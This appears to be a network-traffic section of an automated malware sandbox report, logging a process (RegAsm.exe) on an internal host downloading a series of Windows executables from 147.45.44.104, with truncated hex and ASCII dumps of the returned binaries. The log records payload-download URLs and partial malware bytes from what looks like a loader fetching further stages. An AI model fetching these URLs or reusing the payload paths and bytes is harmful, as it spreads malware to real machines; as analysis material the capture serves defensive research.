Sep 4, 2024 17:37:06.564950943 CEST	1236	IN	Data Raw: a9 22 73 8a ab 0b 92 39 9a c9 8b eb 10 33 38 ce 43 ac 3f 88 23 39 cb 44 b2 f4 3f eb 49 21 26 23 7d 7c d3 18 52 36 f7 03 9e ed 45 0d 53 6b 7a b5 82 61 b0 07 05 e0 f3 39 b1 ac 4f 8f 70 60 41 ee c1 7a 49 af 9f 84 70 6f 85 a5 3f 19 d4 61 0e eb 50 76 Data Ascii: "s938C?#9D?I!&#}\|R6ESkza9Op`AzIpo?aPv\|l}zT3sm=m1U+ba/J8"&sFm.?_#tFOE#_Bc'lbO~*PwL\5DZxZ\[iVFc5t4eNk
Sep 4, 2024 17:37:06.565473080 CEST	328	IN	Data Raw: bf 98 bb c8 7b 56 98 6c fd 5e 41 a1 28 a7 9d ad 6d db c5 d8 b7 c3 03 4c 59 55 fd 60 4b 4d 26 08 74 7c 7b a0 74 06 03 40 4e fa 3b 58 67 a5 d8 10 77 5c 8e 10 b5 bd 2c 9f c0 69 09 27 73 f6 05 ef 76 00 35 30 7d c7 5a 2d c4 3e bc 65 f7 56 91 b3 a1 6f Data Ascii: {Vl^A(mLYU`KM&t\|{t@N;Xgw\,i'sv50}Z->eVoEX's/2kQW'0Lkc`z=O'xW8r;~MjkCx4~V\CpSo#2vE3K'BsSTo[W3/Tf[ki\`7f@
Sep 4, 2024 17:37:06.565542936 CEST	1236	IN	Data Raw: 92 9e 52 b1 c0 cc b3 14 f9 48 03 8c fe fc 97 f0 a2 aa 84 17 ee 6c dd 8d 50 b7 2f cd ad fa 07 7a 75 d3 75 84 67 c6 4a 17 9b 08 44 dd 54 b3 f1 0b 58 19 9b fc b5 c9 cc 2e 5a 15 3b fa 1c 20 5c c5 a2 09 bf 6f d8 2d f9 fc 63 05 6d 16 c5 52 89 7c 9b c9 Data Ascii: RHlP/zuugJDTX.Z; \o-cmR\|y.6Q_M~;>WW6tY?Av`VAwn7TXWDl>$xbufZ@-}v 54I4yH>Uk:kCMB]J@$O"a9E8Xz5_$Mz
Sep 4, 2024 17:37:07.094536066 CEST	224	OUT	GET /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:07.282015085 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:07 GMT Content-Type: application/octet-stream Content-Length: 3851776 Last-Modified: Mon, 02 Sep 2024 11:18:17 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d59ef9-3ac600" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 15 38 33 9d 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 e0 29 00 00 e2 10 00 00 00 00 00 9e ff 29 00 00 20 00 00 00 00 2a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 50 ff 29 00 4b 00 00 00 00 20 2a 00 08 dd 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 0c 00 00 00 02 ff 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL83)) @ ;@P)K ;) H.text) ) `.sdata)@.rsrc )@@.reloc;:@B
Sep 4, 2024 17:37:10.004678011 CEST	217	OUT	GET /prog/66d70e8640404_trics.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:10.189287901 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:10 GMT Content-Type: application/octet-stream Content-Length: 8684256 Last-Modified: Tue, 03 Sep 2024 13:26:30 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d70e86-8482e0" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a8 b8 50 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 08 80 00 00 9e 03 00 00 00 00 00 ce 26 80 00 00 20 00 00 00 40 80 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 84 00 00 04 00 00 49 b2 84 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 26 80 00 4b 00 00 00 00 60 80 00 d6 97 03 00 00 00 00 00 00 00 00 00 00 aa 83 00 e0 d8 00 00 00 00 84 00 0c 00 00 00 36 26 80 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP& @@ I@&K`6& H.text `.sdata@@.rsrc`@@.reloc@B
Sep 4, 2024 17:37:16.170147896 CEST	218	OUT	GET /revada/66c6fcb30b9dd_123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:16.356266022 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:16 GMT Content-Type: application/octet-stream Content-Length: 10902016 Last-Modified: Thu, 22 Aug 2024 08:54:11 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66c6fcb3-a65a00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 30 fc c6 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 82 00 00 00 06 cd 00 00 00 00 00 6f 09 82 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 99 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 ef 81 01 3c 00 00 00 00 80 96 01 d0 04 03 00 40 53 96 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0e 81 01 28 00 00 00 00 52 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd0f#o@ <@S`*P(R8 .text `.rdata @@.data@.pdata@@.00cfg@@.tls@.text0:( `.text1X @.text2M0N`h.rsrcT@@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49717	147.45.44.104	80	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:05.177716017 CEST	220	OUT	HEAD /prog/66d70775c548d_v.exe#space HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:05.796566010 CEST	309	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:05 GMT Content-Type: application/octet-stream Content-Length: 290344 Last-Modified: Tue, 03 Sep 2024 12:56:21 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d70775-46e28" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 4, 2024 17:37:05.796952963 CEST	225	OUT	HEAD /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:05.982186079 CEST	311	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:05 GMT Content-Type: application/octet-stream Content-Length: 3851776 Last-Modified: Mon, 02 Sep 2024 11:18:17 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d59ef9-3ac600" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 4, 2024 17:37:05.982479095 CEST	222	OUT	HEAD /yuop/66d72df86b9f3_crypted.exe#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:06.164539099 CEST	309	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:06 GMT Content-Type: application/octet-stream Content-Length: 320512 Last-Modified: Tue, 03 Sep 2024 15:40:40 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d72df8-4e400" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 4, 2024 17:37:06.164747000 CEST	218	OUT	HEAD /prog/66d70e8640404_trics.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:06.346296072 CEST	311	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:06 GMT Content-Type: application/octet-stream Content-Length: 8684256 Last-Modified: Tue, 03 Sep 2024 13:26:30 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d70e86-8482e0" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 4, 2024 17:37:06.346549034 CEST	231	OUT	HEAD /yuop/66d60cd3ce002_SeparatelyDied.exe#sun HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:06.530119896 CEST	311	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:06 GMT Content-Type: application/octet-stream Content-Length: 1760552 Last-Modified: Mon, 02 Sep 2024 19:06:59 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d60cd3-1add28" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 4, 2024 17:37:06.530411959 CEST	223	OUT	GET /yuop/66d58b1858bcb_crypted.exe#xin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:06.715758085 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:06 GMT Content-Type: application/octet-stream Content-Length: 528896 Last-Modified: Mon, 02 Sep 2024 09:53:28 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d58b18-81200" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a9 81 d5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 08 00 00 08 00 00 00 00 00 00 ce 27 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 08 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 27 08 00 57 00 00 00 00 40 08 00 d8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 3c 26 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf' @@ `t'W@`<& H.text `.rsrc@@@.reloc`@B'Hl&f;JJs}/1l2Ea}pyxzZ@l{C$t9sKn~M[PTBNi#}j}S@kr#GB^}T1#'cQb6k;1^&D;kXSxNTE(/h12+5Pv@/=?Q,v7p#da8ym~CsN1y0i.9E>VQZ?M\2]7*)Z"`=QyFA3j1j=e
Sep 4, 2024 17:37:06.715816975 CEST	224	IN	Data Raw: 4e 41 ee 32 da 99 02 e6 36 06 c0 e2 05 52 43 c7 13 2f 63 51 f2 30 ad ac e9 bb 24 c4 4f 53 f1 f0 2b 82 5a 41 7d 42 c4 f0 1d 8c 68 4d 2a 73 bd ef fc af d5 70 c4 14 08 01 7a c1 b3 1f 9c 87 77 24 52 11 ff 48 2e 4c 9b cd fa b1 20 4c 10 05 53 e0 14 aa Data Ascii: NA26RC/cQ0$OS+ZA}BhM*spzw$RH.L LSgE!4aVIKv7OYGfW<?,Z``t:a(Z]\|dt`K:cjw5%3C^)AJ!70dp.:
Sep 4, 2024 17:37:06.715827942 CEST	1236	IN	Data Raw: 62 a4 38 48 cf 6f cc ee 2f 0f f5 5f 56 d8 1b b7 e8 04 1a b7 ae 2d 10 d7 07 cd be 31 49 4a 60 b6 d2 21 36 1e d9 12 53 68 d1 d7 3f f8 47 8b 67 33 5c 01 f7 b2 ec ab e4 a1 0d 87 0b b4 b8 a8 d5 40 8c f0 f2 e2 02 15 b3 21 99 f2 43 cb 84 39 bc e2 f5 5f Data Ascii: b8Ho/_V-1IJ`!6Sh?Gg3\@!C9_tw9`}iPz/T5=Y0Q9 7bFqM8V:Yp5P{(]YD.nmertqR=,<' ~'gXhGuhypIc" 5IP
Sep 4, 2024 17:37:06.715879917 CEST	1236	IN	Data Raw: c3 59 4d 5f 9d 2a a1 a1 d5 ee 33 3d 57 37 f4 c1 e6 eb a0 39 46 f4 c6 b1 64 9a e8 11 79 c9 1a ab 17 2d 85 76 3b f1 b5 a1 a0 c8 a6 e9 c5 69 24 b0 da 80 3b 91 05 c3 d9 20 4b 33 4c 35 89 ec d7 6a 81 5d 08 4e aa a8 9c c6 79 4d 49 77 b3 da 24 ec a6 f3 Data Ascii: YM_3=W79Fdy-v;i$; K3L5j]NyMIw$:3&!PTE,e1d$k8n.6/,\|ScrJvUSb8h+6n>M`ycQGNqoUVFfV:?^Ld"
Sep 4, 2024 17:37:06.715889931 CEST	1236	IN	Data Raw: 14 4a 0d 06 ab 4c 70 27 ec 88 41 99 e3 0c 71 5a d9 8a 3d f2 40 3b cb df 1c ab 36 23 dd 25 44 54 d8 b1 e7 64 c2 15 1d c8 94 d7 d8 bf 53 e5 51 bd 4a c0 c7 24 8c 6c 59 61 99 61 75 40 da 9c 84 36 d0 34 02 46 b6 4d 84 25 5d c7 da e7 ed cb c8 3a a0 17 Data Ascii: JLp'AqZ=@;6#%DTdSQJ$lYaau@64FM%]:E[h5',l@C*gRF/Hhw@)Z7#`hE`aAfnwyB@aRwi It!&-(1\|wa1[oWS}Z]EICPZ
Sep 4, 2024 17:37:06.715900898 CEST	1236	IN	Data Raw: ea aa 28 c8 ea d4 7e f2 75 9f 9b 18 46 20 65 7e 43 0f 0a ad 12 06 8b a2 c8 2e 60 db de 7d c5 49 7f 63 44 1e 0f 24 38 aa e5 81 f9 cb aa 6d e7 92 be 75 19 04 83 79 b2 61 00 c8 e4 6f 70 26 b6 71 b8 c5 09 35 6f 8e 92 b0 30 41 9c ef d7 24 16 ad 9c 73 Data Ascii: (~uF e~C.`}IcD$8muyaop&q5o0A$sw2)Cp?J]HoTYE"<CLC.VoG6/``7@+9s"]8CJr(@H(OftD8v1}/7SR.b%I~m/D{
Sep 4, 2024 17:37:06.716610909 CEST	1236	IN	Data Raw: 38 bb c1 55 48 cf e4 b7 90 ac c5 b8 1d 0b 48 15 cc 47 10 fd dc cb 62 82 e8 13 91 f8 7c d9 57 a6 39 f7 05 ea cd fa 4f f5 e8 b6 5e 87 75 a1 98 4d 88 0a 2d 33 d5 ed 1e c5 40 43 0a fe 44 a6 6d f5 b6 e4 3a 88 11 30 4f 06 2d 08 f9 14 6b ee 1b a1 ed ad Data Ascii: 8UHHGb\|W9O^uM-3@CDm:0O-k{R}+b(Z8\|MC nuy267csnGhwJ!kCsM#k(Qo7Z78AB\Up7Glqp[\|"\(
Sep 4, 2024 17:37:06.716665983 CEST	1236	IN	Data Raw: ee 37 0b 6a 08 e1 29 23 10 fb fc 2a 86 0b 04 7b 8a b6 9b fb 46 3f f5 8c 2d 60 f1 ea 0f b4 de 04 72 98 34 c2 fa f8 da 7d 37 bf a3 26 51 5d b2 3a 3e 13 69 a8 1d 87 07 f3 d1 09 90 7a 8c d7 8e e6 5e 81 7d f3 7a 55 e0 1d 27 ec ce be 86 ae c8 0b 06 6f Data Ascii: 7j)#*{F?-`r4}7&Q]:>iz^}zU'o?jWhG6}oe&cJde=3/MNqaRe;AnhhO#7\=OLCeEp:?xZAsWNw+4~P$G[c'
Sep 4, 2024 17:37:06.716677904 CEST	1236	IN	Data Raw: b3 06 4f 87 bb d8 8c 7d a5 31 a6 0d 16 05 64 12 e1 87 a1 ad 8f ab f0 9b 02 b9 ce 5a 59 6c 47 06 65 40 b6 e4 e3 03 1b 10 41 45 8f b5 0b 99 c9 66 0d 0a 0b 31 ea 86 ba 2a 12 69 6b e4 34 58 7b 3c 6a 05 f8 68 e6 db 8e 99 a0 13 78 89 83 20 3b e5 7b 72 Data Ascii: O}1dZYlGe@AEf1*ik4X{<jhx ;{rY1/gr^9'EbwH1aObuVcmUx%y+S{dvM/LeR_(>;%4&X:`dE[7/~Qf#H%dN\'JVt-5b@_MW"t.
Sep 4, 2024 17:37:06.716751099 CEST	1236	IN	Data Raw: 4a bb f4 81 bf 7a 44 35 55 f4 7c 10 8d 37 ad c6 da ee da 48 06 e2 60 18 8a 08 b8 c5 60 38 24 85 30 c6 9e 78 b6 00 ac 1f e7 38 1f df 48 89 60 92 71 ad 46 8f 14 8e 45 a1 29 f0 95 4e 7d 26 03 7e 02 af 77 b4 b0 35 7c 37 52 a5 f5 d7 fc 28 b4 4a 40 c9 Data Ascii: JzD5U\|7H``8$0x8H`qFE)N}&~w5\|7R(J@oMg%b>_DJ/#%RP5DKSXuV205U2PFyVmBX(vXp&VfmduE(C3U?
Sep 4, 2024 17:37:06.717442036 CEST	1236	IN	Data Raw: af 72 de 8b 6a 3d b7 fd f4 25 88 e0 a6 b5 6e f3 68 77 c3 73 f9 e0 48 f1 f8 1b a4 97 59 41 45 2d 23 02 67 34 ed 05 71 fa 17 ca 22 ff 74 24 03 a4 75 9f a1 0d 1d 14 14 b1 02 b1 9b 32 b4 8c 44 f9 72 d7 f4 f5 80 23 1a 11 30 09 ef de b7 13 fe 67 87 fe Data Ascii: rj=%nhwsHYAE-#g4q"t$u2Dr#0g]P@NJX\|j`qs,a7Xu"CH9>7,Ov6q5x0X<L;W(rc?3iu=^8jpHmw7hSm34w?.{"r@-OND#2&,
Sep 4, 2024 17:37:07.262165070 CEST	219	OUT	GET /prog/66d707730e9bf_s.exe#space HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:07.457757950 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:07 GMT Content-Type: application/octet-stream Content-Length: 210984 Last-Modified: Tue, 03 Sep 2024 12:56:19 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d70773-33828" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 06 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 06 03 00 00 0a 00 00 00 00 00 00 7e 24 03 00 00 20 00 00 00 40 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 03 00 00 02 00 00 53 30 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 24 03 00 57 00 00 00 00 40 03 00 02 06 00 00 00 00 00 00 00 00 00 00 00 12 03 00 28 26 00 00 00 60 03 00 0c 00 00 00 ec 22 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf~$ @@ S0`$$W@(&`" H.text `.rsrc@@@.reloc`@B`$H,MLU_&DX5qM-N4hBK+d60TSTXqSCa}&iA[7FmKSl)I}[9Rz2(CZ`>aFR1$T@Sm3IqPD27>Sc [HO1J{3hKx(<O\sorA4})w)lE1(?RAEWa`l;&62SWl)B;]<^JX\~Z{88B52'
Sep 4, 2024 17:37:07.543742895 CEST	221	OUT	GET /yuop/66d72df86b9f3_crypted.exe#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:07.725645065 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:07 GMT Content-Type: application/octet-stream Content-Length: 320512 Last-Modified: Tue, 03 Sep 2024 15:40:40 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d72df8-4e400" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 20 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 0a 00 00 00 00 00 00 7e f6 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 18 6c 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 f6 04 00 57 00 00 00 00 00 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 ec f4 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL f~ @ @l`$W H.text `.rsrc@@.reloc @B`H,,p`=(B1VALfpE?'vkzG/OL*8OO50RSpJ$n\|^v\|}T[cr$kAwk\|lP2U6f$okIMJ01~h~Yr:/[0cA]cEz4RGG\|(EYJe~hXv%6}O}<:LA`c3!]/}p8@LB>Nh>!iZ0} o#6
Sep 4, 2024 17:37:08.116462946 CEST	219	OUT	GET /malesa/66d1b7f7f3765_Front.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:08.309461117 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:08 GMT Content-Type: application/octet-stream Content-Length: 14748160 Last-Modified: Fri, 30 Aug 2024 12:15:51 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d1b7f7-e10a00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 34 de 00 00 00 00 00 e0 00 02 01 0b 01 03 00 00 88 60 00 00 e6 0a 00 00 00 00 00 10 7c 07 00 00 10 00 00 00 40 d1 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 c0 e4 00 00 04 00 00 56 55 e1 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 dc 00 4c 04 00 00 00 e0 e1 00 95 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 00 5c fa 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL4`\|@@VU@L\@V.text(`` `.rdata,p`p`@@.dataw@ @.idataL2@.reloc\8@B.symtab4B.rsrc6@@
